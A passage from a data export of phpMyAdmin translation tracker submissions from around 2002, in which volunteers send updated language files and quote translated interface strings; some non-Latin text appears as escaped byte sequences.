amp;lt;br amp;gt;xd0x92xd1x8bxd0xb7xd0xbexd0xb2xd0xb8xd1x82xd0xb5 xd1x8dxd1x82xd0xbexd1x82 xd1x84xd0xb0xd0xb9xd0xbb config.inc.php) xd0xbdxd0xb5xd0xbfxd0xbexd1x81xd1x80xd0xb5xd0xb4xd1x81xd1x82xd0xb2xd0xb5xd0xbdxd0xbdxd0xbe xd0xb8xd0xb7 xd0xb1xd1x80xd0xbexd1x83xd0xb7xd0xb5xd1x80xd0xb0.
xd0x95xd1x81xd0xbbxd0xb8 xd0xb1xd1x83xd0xb4xd1x83xd1x82 xd1x81xd0xbexd0xbexd0xb1xd1x89xd0xb5xd0xbdxd0xb8xd1x8f xd0xbexd0xb1 xd0xbexd1x88xd0xb8xd0xb1xd0xbaxd0xb0xd1x85 xd0xb8xd1x81xd0xbfxd1x80xd0xb0xd0xb2xd1x8cxd1x82xd0xb5 xd0xb8xd1x85.
xd0x95xd1x81xd0xbbxd0xb8 xd0xbfxd1x83xd1x81xd1x82xd0xb0xd1x8f xd1x81xd1x82xd1x80xd0xb0xd0xbdxd0xb8xd1x86xd0xb0 xd0xb2xd1x81xd0xb5 xd0xb2 xd0xbfxd0xbexd1x80xd1x8fxd0xb4xd0xbaxd0xb5 ; to translate strNotSet = xd0xa2xd0xb0xd0xb1xd0xbbxd0xb8xd1x86xd0xb0 amp;lt;b amp;gt; s amp;lt; b amp;gt; xd0xbdxd0xb5 xd0xbdxd0xb0xd0xb9xd0xb4xd0xb5xd0xbdxd0xb0 ; to translate strMissingBracket = Missing Bracket ; to translate strHaveToShow = xd0x92xd1x8b xd0xb4xd0xbexd0xbbxd0xb6xd0xbdxd1x8b xd0xb2xd1x8bxd0xb1xd1x80xd0xb0xd1x82xd1x8c xd0xbdxd0xb5 xd0xbcxd0xb5xd0xbdxd0xb5xd0xb5 xd0xbexd0xb4xd0xbdxd0xbexd0xb9 xd0xbaxd0xbexd0xbbxd0xbexd0xbdxd0xbaxd0xb8 xd0xb4xd0xbbxd1x8f xd0xbexd1x82xd0xbexd0xb1xd1x80xd0xb0xd0xb6xd0xb5xd0xbdxd0xb8xd1x8f ; to translate strCantLoadRecodeIconv = xd0x9dxd0xb5 xd0xbcxd0xbexd0xb3xd1x83 xd0xb7xd0xb0xd0xb3xd1x80xd1x83xd0xb7xd0xb8xd1x82xd1x8c iconv xd0xb8xd0xbbxd0xb8 recode, xd0xbdxd0xb5xd0xbexd0xb1xd1x85xd0xbexd0xb4xd0xb8xd0xbcxd1x8bxd0xb5 xd0xb4xd0xbbxd1x8f xd0xbfxd0xb5xd1x80xd0xb5xd0xbaxd0xbexd0xb4xd0xb8xd1x80xd0xbexd0xb2xd0xb0xd0xbdxd0xb8xd1x8f xd1x81xd0xb8xd0xbcxd0xb2xd0xbexd0xbbxd0xbexd0xb2.
xd0x9fxd1x80xd0xbexd0xb2xd0xb5xd1x80xd1x8cxd1x82xd0xb5 php xd0xbaxd0xbexd0xbdxd1x84xd0xb8xd0xb3xd1x83xd1x80xd0xb0xd1x86xd0xb8xd1x8e xd0xb8 xd1x80xd0xb0xd0xb7xd1x80xd0xb5xd1x88xd0xb8xd1x82xd0xb5 xd0xb8xd1x85 xd0xb8xd1x81xd0xbfxd0xbexd0xbbxd1x8cxd0xb7xd0xbexd0xb2xd0xb0xd0xbdxd0xb8xd0xb5 xd0xb8xd0xbbxd0xb8 xd0xb7xd0xb0xd0xbfxd1x80xd0xb5xd1x82xd0xb8xd1x82xd0xb5 xd0xbfxd0xb5xd1x80xd0xb5xd0xbaxd0xbexd0xb4xd0xb8xd1x80xd0xbexd0xb2xd0xb0xd0xbdxd0xb8xd0xb5 xd1x81xd0xb8xd0xbcxd0xb2xd0xbexd0xbbxd0xbexd0xb2 xd0xb2 phpMyAdmin.
; to translate strCantUseRecodeIconv = xd0x9dxd0xb5 xd0xbcxd0xbexd0xb3xd1x83 xd0xb8xd1x81xd0xbfxd0xbexd0xbbxd1x8cxd0xb7xd0xbexd0xb2xd0xb0xd1x82xd1x8c iconv xd1x84xd1x83xd0xbdxd0xbaxd1x86xd0xb8xd0xb8 xd0xbdxd0xb8 libiconv, xd0xbdxd0xb8 recode string, xd0xbfxd0xbexd0xbaxd0xb0 xd0xbdxd0xb5 xd0xb1xd1x83xd0xb4xd1x83xd1x82 xd0xb7xd0xb0xd0xb3xd1x80xd1x83xd0xb6xd0xb5xd0xbdxd1x8b extension reports.
xd0x9fxd1x80xd0xbexd0xb2xd0xb5xd1x80xd1x8cxd1x82xd0xb5 php xd0xbaxd0xbexd0xbdxd1x84xd0xb8xd0xb3xd1x83xd1x80xd0xb0xd1x86xd0xb8xd1x8e.
; to translate strMySQLCharset = MySQL xd0xbaxd0xbexd0xb4xd0xb8xd1x80xd0xbexd0xb2xd0xbaxd0xb0 ; to translate strComments = xd0x9axd0xbexd0xbcxd0xbcxd0xb5xd0xbdxd1x82xd0xb0xd1x80xd0xb8xd0xb8 ; to translate Original URL https sourceforge.net p phpmyadmin translations 154 https sourceforge.net p phpmyadmin translations 154 Original author anonymous","bug"
"24444","3186","Estonian language update.
2 new strings and 1 fix Original URL https sourceforge.net p phpmyadmin translations 155 https sourceforge.net p phpmyadmin translations 155 Original author finsoft","bug"
"24444","3187","italian.
updates Original URL https sourceforge.net p phpmyadmin translations 156 https sourceforge.net p phpmyadmin translations 156 Original author danone","bug"
"24444","3188","Swedish translation.
Here is the Swedish translation of the latest messages.
Bjxc3xb6rn T. Hallberg Original URL https sourceforge.net p phpmyadmin translations 157 https sourceforge.net p phpmyadmin translations 157 Original author bth","bug"
"24444","3189","italian.
updates Original URL https sourceforge.net p phpmyadmin translations 158 https sourceforge.net p phpmyadmin translations 158 Original author danone","bug"
"24444","3190","lithuanian translation windows 1257).
translated file lithuanian windows 1257.inc.php3 Original URL https sourceforge.net p phpmyadmin translations 159 https sourceforge.net p phpmyadmin translations 159 Original author viliusz","bug"
"24444","3191","Dutch Translation Opdate.. strPdfNoTables = Geen Tabellen ; strDisplayFeat = Toon Opties strCreatePdfFeat = Aanmaken van PDF bestanden ; strColComFeat = Toon kolom commentaar ; strDisabled = Uitgeschakeld ; strEnabled = Ingeschakeld ; strOK = Goed ; strNotOK = Niet Goed ; strGeneralRelationFeat = Basis relatie opties ; There ya go.
Ivo amp;quot;CaliMonk amp;quot; Teel Original URL https sourceforge.net p phpmyadmin translations 160 https sourceforge.net p phpmyadmin translations 160 Original author anonymous","bug"
"24444","3192","Indonesian Translations.
Hi phpMyAdmin Developers Attached you ll find the actual indonesian translations to phpMyAdmin as per 29 07 2002 Regards Rachim Tamsjadi Original URL https sourceforge.net p phpmyadmin translations 161 https sourceforge.net p phpmyadmin translations 161 Original author tamsy","bug"
"24444","3193","Indonesian Translations Update.
Hi phpMyAdmin Developers.
There was a bug in the strRelationNotWorking string for the indonesian translations which I have corrected with this update.
For your information This bug already went into the last release phpMyAdmin 2.3.0 rc4.
Regards, Rachim Tamsjadi Original URL https sourceforge.net p phpmyadmin translations 162 https sourceforge.net p phpmyadmin translations 162 Original author tamsy","bug"
"24444","3194","Estonian language update.
New translations Original URL https sourceforge.net p phpmyadmin translations 163 https sourceforge.net p phpmyadmin translations 163 Original author finsoft","bug"
"24444","3195","russian windows 1251. russian windows 1251 Original URL https sourceforge.net p phpmyadmin translations 164 https sourceforge.net p phpmyadmin translations 164 Original author anonymous","bug"
"24444","3196","2.3.0 galician utf 8. strDisplayFeat = Mostrar as caracterxc3xadsticas ; strCreatePdfFeat = Creacixc3xb3n de PDFs ; strColComFeat = Mostrando os comentarios das columnas ; strDisabled = Desactivado ; strEnabled = Activado ; strOK = Conforme ; strNotOK = non conforme ; strGeneralRelationFeat = Caracterxc3xadsticas xerais das relacixc3xb3ns ; Original URL https sourceforge.net p phpmyadmin translations 165 https sourceforge.net p phpmyadmin translations 165 Original author xosecalvo","bug"
"24444","3197","albanian.
albanian updated Original URL https sourceforge.net p phpmyadmin translations 166 https sourceforge.net p phpmyadmin translations 166 Original author laurenti","bug"
"24444","3198","2.3.0 Galician utf 8. strPdfNoTables = Sen tabelas ; Original URL https sourceforge.net p phpmyadmin translations 167 https sourceforge.net p phpmyadmin translations 167 Original author xosecalvo","bug"
"24444","3199","Czech.
Here comes updated Czech translation....
Original URL https sourceforge.net p phpmyadmin translations 168 https sourceforge.net p phpmyadmin translations 168 Original author nijel","bug"
"24444","3200","slovak iso8859 2. hello, here are some updates for slovak translation.
bye Original URL https sourceforge.net p phpmyadmin translations 169 https sourceforge.net p phpmyadmin translations 169 Original author erkac","bug"
"24444","3201","Spanish translation for rc4.
Made an attempt to translate all the new lines.
Corrected one previous mistake mine).
Daniel Original URL https sourceforge.net p phpmyadmin translations 170 https sourceforge.net p phpmyadmin translations 170 Original author anonymous","bug"
"24444","3202","Thai translation.
sorry for previous tracker, i forgot to check the checkbox.
Original URL https sourceforge.net p phpmyadmin translations 171 https sourceforge.net p phpmyadmin translations 171 Original author bacteria","bug"
"24444","3203","Catalan translation.
This is the catalan translation file, updated from the lastest version of CVS.
Original URL https sourceforge.net p phpmyadmin translations 172 https sourceforge.net p phpmyadmin translations 172 Original author xavin","bug"
"24444","3204","portuguese translation update.
portuguese translation update Original URL https sourceforge.net p phpmyadmin translations 173 https sourceforge.net p phpmyadmin translations 173 Original author lopopizarro","bug"
"24444","3205","chinese BIG5 and GB translation update.
I am not sure the translation is match in chinese becuase i can t try.
Hope if have release rc 5 i can try these function and translate it better.
ps.
please help to change my name in translators.html to Siu Sun, i feel strange just for me have double quote.
THX!
Original URL https sourceforge.net p phpmyadmin translations 174 https sourceforge.net p phpmyadmin translations 174 Original author siusun","bug"
"24444","3206","Updated slovene translations.
Updated slovene translations in all three codepages Original URL https sourceforge.net p phpmyadmin translations 175 https sourceforge.net p phpmyadmin translations 175 Original author urosh","bug"
"24444","3207","italian.
updates ; P Original URL https sourceforge.net p phpmyadmin translations 176 https sourceforge.net p phpmyadmin translations 176 Original author danone","bug"
"24444","3208","slovak iso8859 2 translation update.
hello, here is slovak translation update in charset iso8859 2. please merge it.
bye Original URL https sourceforge.net p phpmyadmin translations 177 https sourceforge.net p phpmyadmin translations 177 Original author erkac","bug"
"24444","3209","Swedish translation.
Here is the Swedish translation for the new messages.
Bjxc3xb6rn T. Hallberg Original URL https sourceforge.net p phpmyadmin translations 178 https sourceforge.net p phpmyadmin translations 178 Original author bth","bug"
"24444","3210","Indonesian Translations.
Hi.
Here are the latest indonesian Translations for phpMyAdmin.
Regards, Rachim Original URL https sourceforge.net p phpmyadmin translations 179 https sourceforge.net p phpmyadmin translations 179 Original author tamsy","bug"
"24444","3211","Estonian language update.
New translations Original URL https sourceforge.net p phpmyadmin translations 180 https sourceforge.net p phpmyadmin translations 180 Original author finsoft","bug"
"24444","3212","Czech translation.
Translated last minute messages for 2.3.0.... Michal Original URL https sourceforge.net p phpmyadmin translations 181 https sourceforge.net p phpmyadmin translations 181 Original author nijel","bug"
"24444","3213","Updated Greek Translation.
Here you are guys... Just cause I couldn t go on vacation and actually do nothing, here s the updated Greek translation iso 8859 7 file).
RC4 looks really great guys.
Awesome work ) BTW looks like greg sent me an email or at least tried to) however I just received a blank message.
If it ain t too much trouble, please send it again ) Thanks Original URL https sourceforge.net p phpmyadmin translations 182 https sourceforge.net p phpmyadmin translations 182 Original author theremon","bug"
"24444","3214","Swedish translation.
Swedish translation of the last new message.
Bjxc3xb6rn T. Hallberg Original URL https sourceforge.net p phpmyadmin translations 184 https sourceforge.net p phpmyadmin translations 184 Original author bth","bug"
"24444","3215","Indonesian Translations Update.
Hi.
Here are the indonesian translations updated with the new string Fixed bug 590863) strCharsetOfFile = .
Regards Rachim Original URL https sourceforge.net p phpmyadmin translations 185 https sourceforge.net p phpmyadmin translations 185 Original author tamsy","bug"
"24444","3216","Finnish translation.
Here are the latest Finnish translations for 2.3.0.
In addition to translating the new strings, I ve now encoded all Scandinavian characters in order to get them displayed correctly in all browsers.
Visa Original URL https sourceforge.net p phpmyadmin translations 183 https sourceforge.net p phpmyadmin translations 183 Original author visa","bug"
"24444","3217","Estonian language update.
strCharsetOfFile = Faili txc3xa4hekodeering ; Original URL https sourceforge.net p phpmyadmin translations 186 https sourceforge.net p phpmyadmin translations 186 Original author finsoft","bug"
"24444","3218","Estonian language update.
New parser error messages etc Original URL https sourceforge.net p phpmyadmin translations 187 https sourceforge.net p phpmyadmin translations 187 Original author finsoft","bug"
"24444","3219","Updated indonesian translations.
Hi.
Attached you ll find the updated indonesian translations with the latest strings regarding the new SQL Parser system.
Regards Rachim Original URL https sourceforge.net p phpmyadmin translations 188 https sourceforge.net p phpmyadmin translations 188 Original author tamsy","bug"
"24444","3220","Czech update.
One more czech update....
Original URL https sourceforge.net p phpmyadmin translations 189 https sourceforge.net p phpmyadmin translations 189 Original author nijel","bug"
"24444","3221","New Hindi Translation.
Hello All, This is the hindi UTF 8) Translation of the messages from the english version.
The id of english lang file is amp;quot;english utf 8.inc.php3,v 1.12 2002 07 27 12 11 47 lem9 amp;quot; Hope to see the new translation added in the next release.
Girish Nair amp;lt;girishn nagpur.dot.net.in amp;gt; Original URL https sourceforge.net p phpmyadmin translations 190 https sourceforge.net p phpmyadmin translations 190 Original author girish nair","bug"
"24444","3222","Thai translation.
for your review.
Original URL https sourceforge.net p phpmyadmin translations 191 https sourceforge.net p phpmyadmin translations 191 Original author bacteria","bug"
"24444","3223","italian.
updates bye dan Original URL https sourceforge.net p phpmyadmin translations 192 https sourceforge.net p phpmyadmin translations 192 Original author danone","bug"
"24444","3224","Swedish translation.
Here is the Swedish translation for the new SQL Parser strings.
Bjxc3xb6rn T. Hallberg Original URL https sourceforge.net p phpmyadmin translations 193 https sourceforge.net p phpmyadmin translations 193 Original author bth","bug"
"24444","3225","major slovak translation update !.
hello, here is slovak iso8859 2) translation update.
this update is really important, please merge it.
thank you.
Original URL https sourceforge.net p phpmyadmin translations 194 https sourceforge.net p phpmyadmin translations 194 Original author erkac","bug"
"24444","3226","polish update.
polish update Original URL https sourceforge.net p phpmyadmin translations 195 https sourceforge.net p phpmyadmin translations 195 Original author ubanus","bug"
"24444","3227","chinese BIG5 and GB translation update.
i keep the last 3 line of about describe bugs in Chinese English.
I think these english is for the programmer in here to look.
Original URL https sourceforge.net p phpmyadmin translations 196 https sourceforge.net p phpmyadmin translations 196 Original author siusun","bug"
"24444","3228","Albanian translation.
albanian updated Original URL https sourceforge.net p phpmyadmin translations 197 https sourceforge.net p phpmyadmin translations 197 Original author laurenti","bug"
"24444","3229","Slovenian updates.
Slovenian updates Original URL https sourceforge.net p phpmyadmin translations 198 https sourceforge.net p phpmyadmin translations 198 Original author urosh","bug"
"24444","3230","spanish iso 8859 1.
This file have the additional translations to spanish.
The source code is Id spanish iso 8859 1.inc.php3,v 1.23 2002 08 13 12 45 23 Original URL https sourceforge.net p phpmyadmin translations 201 https sourceforge.net p phpmyadmin translations 201 Original author egarcam","bug"
"24444","3231","Czech fix.
Fixed just one typo.... BTW could I get write access to cvs to make such changes easier?
; ) Michal Original URL https sourceforge.net p phpmyadmin translations 199 https sourceforge.net p phpmyadmin translations 199 Original author nijel","bug"
"24444","3232","italian.
updates Original URL https sourceforge.net p phpmyadmin translations 200 https sourceforge.net p phpmyadmin translations 200 Original author danone","bug"
"24444","3233","Malay.
this is the translation file for phpMyAdmin that i ve translate it into my language malay.
I m from malaysia Original URL https sourceforge.net p phpmyadmin translations 202 https sourceforge.net p phpmyadmin translations 202 Original author sicksand","bug"
"24444","3234","Hindi translation updates.
Hello All, I had translated some more messages in hindi utf8.
Please find the file attached.
Original URL https sourceforge.net p phpmyadmin translations 203 https sourceforge.net p phpmyadmin translations 203 Original author girish nair","bug"
"24444","3235","Updated norwegian translation.
Updated Norwegian language file based on CVS from 28 08.
3 strings is still untranslated, will get back to them later.
Sven Erik Original URL https sourceforge.net p phpmyadmin translations 204 https sourceforge.net p phpmyadmin translations 204 Original author sven erik","bug"
"24444","3236","italian.
updates Original URL https sourceforge.net p phpmyadmin translations 205 https sourceforge.net p phpmyadmin translations 205 Original author danone","bug"
"24444","3237","Estonian language update.
New strings translated Original URL https sourceforge.net p phpmyadmin translations 206 https sourceforge.net p phpmyadmin translations 206 Original author finsoft","bug"
"24444","3238","Dutch translation.
Hey, sorry i didn t post for a while, was taking a nice long vacation ) Translated the strings strBeginCut = Begin KNIP ; strBeginRaw = Begin RAW ; strCharsetOfFile = Karakter set van het bestand ; strEndCut = Einde KNIP ; strEndRaw = Einde RAW ; strExplain = Verklaar SQL ; strNoExplain = Uitleg SQL overslaan ; strNoValidateSQL = Validatie SQL overslaan ; strSQLParserBugMessage = Er is een kans dat u een fout heeft aangetroffen in de SQL parser.
Let er goed op, dat de query op de correcte plaatsen quotes heeft.
Een ander mogelijkheid voor deze foutmelding kan zijn dat u het ge quote text gedeelte in bineary mode heeft.
U kunt ook uw query proberen in de command line van MySQL.
De MySQL server foutmelding hieronder, mocht die aanwezig zijn, kan ook helpen met het opsporen van fouten.
Blijft u problemen houden of als de parser fouten geeft terwijl het goed gaat in de command line van MySQL, probeer dan de SQL query in te korten en een bug report met het stukje data te sturen van het CUT gedeelte hieronder ; strSQLParserUserError = Er schijnt een fout te zijn in uw SQL query.
Mocht de MySQL server een error hebben terug gegeven, probeer dan of uw hiermee uw fout kunt oplossen.
; strSQPBugInvalidIdentifer = Ongeldige Identifer ; strSQPBugUnclosedQuote = Quote niet afgesloten ; strSQPBugUnknownPunctuation = Onbekende Punctuatie String ; strValidateSQL = SQL Valideren ; strInsecureMySQL = Uw configuratie bestand bevat instellingen root zonder wachtwoord) die betrekking hebben tot de standaard MySQL account.
Uw MySQL server draait met deze standaard waardes, en is open voor ongewilde toegang, het wordt dus aangeraden dit op te lossen.
; strWebServerUploadDirectory = web server upload directory ; strWebServerUploadDirectoryError = De directory die u heeft ingesteld om te uploaden kan niet worden bereikt.
; strValidatorError = De SQL validatie kon niet worden geinitialiseerd.
Controleer of u de nodige php extensies heeft geinstalleerd zoals beschreven in de sdocumentatie s. ; Ivo amp;quot;CaliMonk amp;quot; Teel Original URL https sourceforge.net p phpmyadmin translations 207 https sourceforge.net p phpmyadmin translations 207 Original author anonymous","bug"
"24444","3239","Thai translation.
th Original URL https sourceforge.net p phpmyadmin translations 208 https sourceforge.net p phpmyadmin translations 208 Original author anonymous","bug"
"24444","3240","italian.
updates Original URL https sourceforge.net p phpmyadmin translations 209 https sourceforge.net p phpmyadmin translations 209 Original author danone","bug"
"24444","3241","italian.
updates Original URL https sourceforge.net p phpmyadmin translations 210 https sourceforge.net p phpmyadmin translations 210 Original author danone","bug"
"24444","3242","malay.
malay translation for 2.3.1 rc1 Original URL https sourceforge.net p phpmyadmin translations 211 https sourceforge.net p phpmyadmin translations 211 Original author sicksand","bug"
"24444","3243","albanian iso 8859 1.inc.php3.
updated Original URL https sourceforge.net p phpmyadmin translations 212 https sourceforge.net p phpmyadmin translations 212 Original author laurenti","bug"
"24444","3244","albanian utf 8.inc.php3.
updated Original URL https sourceforge.net p phpmyadmin translations 213 https sourceforge.net p phpmyadmin translations 213 Original author laurenti","bug"
"24444","3245","polish update.
a few translated strings Original URL https sourceforge.net p phpmyadmin translations 214 https sourceforge.net p phpmyadmin translations 214 Original author ubanus","bug"
"24444","3246","lithuanian translation win 1257).
Here you go.
Original URL https sourceforge.net p phpmyadmin translations 215 https sourceforge.net p phpmyadmin translations 215 Original author viliusz","bug"
"24444","3247","Galician for 2.3.1.
New strings translated.
Original URL https sourceforge.net p phpmyadmin translations 216 https sourceforge.net p phpmyadmin translations 216 Original author xosecalvo","bug"
"24444","3248","Messages for 2.3.1 Norwegian trans.).
Here s the Norwegian translation of the new messages for v2.3.1.
Sven Erik Andersen Original URL https sourceforge.net p phpmyadmin translations 217 https sourceforge.net p phpmyadmin translations 217 Original author sven erik","bug"
"24444","3249","catalan for 2.3.1.
Catalan messages for the 2.3.1 version Original URL https sourceforge.net p phpmyadmin translations 218 https sourceforge.net p phpmyadmin translations 218 Original author xavin","bug"
"24444","3250","Swedish translation for 2.3.1.
Here is the Swedish translation for the new messages.
Bjxc3xb6rn T. Hallberg Original URL https sourceforge.net p phpmyadmin translations 219 https sourceforge.net p phpmyadmin translations 219 Original author bth","bug"
"24444","3251","Finnish translation for 2.3.1.
Latest translations for the Finnish language.
Original URL https sourceforge.net p phpmyadmin translations 220 https sourceforge.net p phpmyadmin translations 220 Original author visa","bug"
"24444","3252","Slovenian translations.
Updated Slovenian translations Original URL https sourceforge.net p phpmyadmin translations 221 https sourceforge.net p phpmyadmin translations 221 Original author urosh","bug"
"24444","3253","Galician 2.3.1rc1 iso 8859 1).
More messages.
Original URL https sourceforge.net p phpmyadmin translations 222 https sourceforge.net p phpmyadmin translations 222 Original author xosecalvo","bug"
"24444","3254","chinese BIG5 and GB translation update.
chinese BIG5 and GB translation update Original URL https sourceforge.net p phpmyadmin translations 223 https sourceforge.net p phpmyadmin translations 223 Original author siusun","bug"
"24444","3255","italian.
updates Original URL https sourceforge.net p phpmyadmin translations 224 https sourceforge.net p phpmyadmin translations 224 Original author danone","bug"
"24444","3256","Indonesian language cleanup amp;amp; update.
hi.
attached with the zip file i send you the latest indonesian translations.
i did a little language cleanup and the strings for up to 2.3.1rc1 are now translated.
regards tamsy Original URL https sourceforge.net p phpmyadmin translations 225 https sourceforge.net p phpmyadmin translations 225 Original author tamsy","bug"
"24444","3257","Estonian language update.
3 new strings Original URL https sourceforge.net p phpmyadmin translations 226 https sourceforge.net p phpmyadmin translations 226 Original author finsoft","bug"
"24444","3258","Slovak translation update.
Slovak translation update iso8859 2 Original URL https sourceforge.net p phpmyadmin translations 227 https sourceforge.net p phpmyadmin translations 227 Original author erkac","bug"
"24444","3259","2.3.1) German Language File Error.
Hi !
There are errors in the German Language files.
I would be glad, if the following variable would be replaced as soon as possible strSQLParserBugMessage = Mxc3xb6glicherweise haben Sie einen Bug im SQL Parser entdeckt.
Bitte xc3xbcberprxc3xbcfen Sie Ihre Abfrage genaustens insbesondere auf falsch gesetzte oder nicht geschlossene Anfxc3xbchrungszeichen.
Eine weitere Ursache kxc3xb6nnte darin liegen, dass Sie versuchen eine Datei mit binxc3xa4ren Daten welche nicht von Anfxc3xbchrungszeichen eingeschlossen sind hochzuladen.
Sie kxc3xb6nnen alternativ versuchen Ihre Abfrage xc3xbcber das MySQL Kommandozeileninterface zu senden.
Die MySQL Fehlerausgabe, falls vorhanden, kann Ihnen auch bei der Fehleranalyse helfen.
Falls Sie weiterhin Probleme haben sollten oder der Parser dort versagt wo die Kommandozeile erfolgreich ist, so reduzieren Sie bitte Ihre Abfrage auf den Befehl, welcher die Probleme verursacht, und senden Sie uns einen Bugreport mit den Datenausschnitt, den Sie weiter unten auf dieser Seite finden.
; greetings Kai Original URL https sourceforge.net p phpmyadmin translations 228 https sourceforge.net p phpmyadmin translations 228 Original author sdcepoppe","bug"
"24444","3260","2.3.2) Show SQL checkbox labeled wrong German).
On the SQL page there is a check box which is labeled similiar to amp;quot;repeat SQL command here amp;quot; in the German language.
But when it is checked then the SQL command is NOT shown again and when it is unchecked it IS shown.
So the label indicates just the opposite use of that checkbox.
Original URL https sourceforge.net p phpmyadmin translations 230 https sourceforge.net p phpmyadmin translations 230 Original author anonymous","bug"
"24444","3261","albanian.
Updated Original URL https sourceforge.net p phpmyadmin translations 229 https sourceforge.net p phpmyadmin translations 229 Original author laurenti","bug"
"24444","3262","Dutch Translation Update.
Hey everyone, The latest Dutch Translation update, sorry it took a while sigh .
strServer = Server s ; strPutColNames = Plaats veldnamen in de eerste rij ; strImportDocSQL = Importeer docSQL Bestanden ; Ivo amp;quot;CaliMonk amp;quot; Teel Original URL https sourceforge.net p phpmyadmin translations 231 https sourceforge.net p phpmyadmin translations 231 Original author anonymous","bug"
"24444","3263","Spanish update.
Following suggestions from Rodrigo Perez Chile).
Original URL https sourceforge.net p phpmyadmin translations 232 https sourceforge.net p phpmyadmin translations 232 Original author anonymous","bug"
"24444","3264","Spanish update for 2.3.2.
Hi Marc, Here is the most recent update for spanish iso 8859 1.inc.php.
Sorry, I still can t log in.
Kind regards, Dr. med.
Daniel Hinostroza C. Original URL https sourceforge.net p phpmyadmin translations 233 https sourceforge.net p phpmyadmin translations 233 Original author anonymous","bug"
"24444","3265","Some corrections for spanish iso 8859 1.. Hi Marc, I found some more words that needed a translation touch up.
The file seems to be much clearer now.
This latest update supersedes all other submitted today.
All the very best, Dr. med.
Daniel Hinostroza C. dhinostroza medscape.com Original URL https sourceforge.net p phpmyadmin translations 234 https sourceforge.net p phpmyadmin translations 234 Original author anonymous","bug"
"24444","3266","Word quot;language quot; in the index.php page.
Seems that the word amp;quot;language amp;quot; in the main page is not included in the language files.
It is correct?
Original URL https sourceforge.net p phpmyadmin translations 235 https sourceforge.net p phpmyadmin translations 235 Original author xavin","bug"
"24444","3267","2.3.2) strFlushTable not defined in dutch.
In the file dutch utf 8.inc.php and dutch iso 8859 1.inc.php the variable strTable is defined twice and variable strFlushTable is not defined.
strTable = Schoon de tabel amp;quot;FLUSH amp;quot;) ; strTable = Tabel ; has to be strFlushTable = Schoon de tabel amp;quot;FLUSH amp;quot;) ; strTable = Tabel ; Original URL https sourceforge.net p phpmyadmin translations 236 https sourceforge.net p phpmyadmin translations 236 Original author anonymous","bug"
"24444","3268","italian updates.
up Original URL https sourceforge.net p phpmyadmin translations 237 https sourceforge.net p phpmyadmin translations 237 Original author danone","bug"
"24444","3269","Dutch update.
Hey all, Here is the latest Dutch update strDataDict = Data Woordenboek ; strPrint = Afdrukken ; Is this ment as printing a string or printing a page Printer)?
I did it as printing through a page, if its printing a string use print.
strPHP40203 = U gebruikt PHP 4.2.3, deze versie heeft een grote fout in multi byte strings mbstring).
Voor meer informatie zie PHP bug report 19404.
Het wordt afgeraden deze versie van PHP te gebruiken met phpMyAdmin.
; Ivo amp;quot;CaliMonk amp;quot; Teel p.s.
Comments?
calimonk gmx.net Original URL https sourceforge.net p phpmyadmin translations 238 https sourceforge.net p phpmyadmin translations 238 Original author anonymous","bug"
"24444","3270","Swedish translation.
Here is the Swedish translation of the new strings for 2.3.3.
Bjxc3xb6rn Original URL https sourceforge.net p phpmyadmin translations 239 https sourceforge.net p phpmyadmin translations 239 Original author bth","bug"
"24444","3271","updated slovenian translations.
updated slovenian translations Original URL https sourceforge.net p phpmyadmin translations 240 https sourceforge.net p phpmyadmin translations 240 Original author urosh","bug"
"24444","3272","lithuanian translation windows 1257).
lithuanian translation windows 1257) Original URL https sourceforge.net p phpmyadmin translations 241 https sourceforge.net p phpmyadmin translations 241 Original author viliusz","bug"
"24444","3273","Updated catalan messages.
Last messages translated and many ortographical corrections.
Original URL https sourceforge.net p phpmyadmin translations 242 https sourceforge.net p phpmyadmin translations 242 Original author xavin","bug"
"24444","3274","Polish update.
Polish update Original URL https sourceforge.net p phpmyadmin translations 243 https sourceforge.net p phpmyadmin translations 243 Original author ubanus","bug"
"24444","3275","albanian updated.
albanian Original URL https sourceforge.net p phpmyadmin translations 244 https sourceforge.net p phpmyadmin translations 244 Original author laurenti","bug"
"24444","3276","Thai translation 4.2.3 bug.
Thai translation Original URL https sourceforge.net p phpmyadmin translations 245 https sourceforge.net p phpmyadmin translations 245 Original author bacteria","bug"
"24444","3277","Norwegian translation for v2.3.3.
Here is the updated norwegian translation for v2.3.3 Sven Erik Original URL https sourceforge.net p phpmyadmin translations 246 https sourceforge.net p phpmyadmin translations 246 Original author sven erik","bug"
"24444","3278","Galician for .2.3.3.
Galician update for 2.3.3.
Original URL https sourceforge.net p phpmyadmin translations 247 https sourceforge.net p phpmyadmin translations 247 Original author xosecalvo","bug"
"24444","3279","chinese BIG5 and GB translation update.
updated Original URL https sourceforge.net p phpmyadmin translations 248 https sourceforge.net p phpmyadmin translations 248 Original author siusun","bug"
"24444","3280","Malay 2.3.3. translation updated Original URL https sourceforge.net p phpmyadmin translations 249 https sourceforge.net p phpmyadmin translations 249 Original author sicksand","bug"
"24444","3281","slovak translation update.
slovak translation update in iso8859 2 Original URL https sourceforge.net p phpmyadmin translations 250 https sourceforge.net p phpmyadmin translations 250 Original author erkac","bug"
"24444","3282","Another Dutch Update.
Hey all, I decided to somewhat go through the dutch file and fix spelling errors, i m sure i ve forgotten some but i ve fixed alot too ) Also i noticed amp;quot; strExplain = Verklaar SQL ; amp;quot; is not translated on phpmyadmin, it just shows amp;quot;Explain SQL amp;quot; for me, i m not sure if this string might need a SQL added to it?
Let me paste what i mean Toon Records 0 16 17 totaal) SQL query [Wijzigen] [Explain SQL] [Crexc3xaber PHP Code] SELECT FROM `news` LIMIT 0, 30 The file i included is a copy of dutch iso 8859 1.inc.php3.
Ivo amp;quot;CaliMonk amp;quot; Teel Original URL https sourceforge.net p phpmyadmin translations 251 https sourceforge.net p phpmyadmin translations 251 Original author anonymous","bug"
"24444","3283","Spanish update for 2.3.3.
Hi, the three new lines for 2.3.3 have been translated.
One minor translation was changed to something a bit more descriptive.
All the best, Dr. med.
Daniel Hinostroza C. dhinostroza medscape.com Original URL https sourceforge.net p phpmyadmin translations 252 https sourceforge.net p phpmyadmin translations 252 Original author anonymous","bug"
"24444","3284","Korean language little update.
This is a little update for Korean language.
I worked in phpMyAdmin version 2.3.2.
But I did not work so much, so not all part was translated.
Forgive me.
I ll do it, later.
Original URL https sourceforge.net p phpmyadmin translations 253 https sourceforge.net p phpmyadmin translations 253 Original author woosuhan","bug"
"24444","3285","more hindi translations.
Hello, Please find more hindi translations 50 ) in the attached files Original URL https sourceforge.net p phpmyadmin translations 254 https sourceforge.net p phpmyadmin translations 254 Original author girish nair","bug"
"24444","3286","italian.
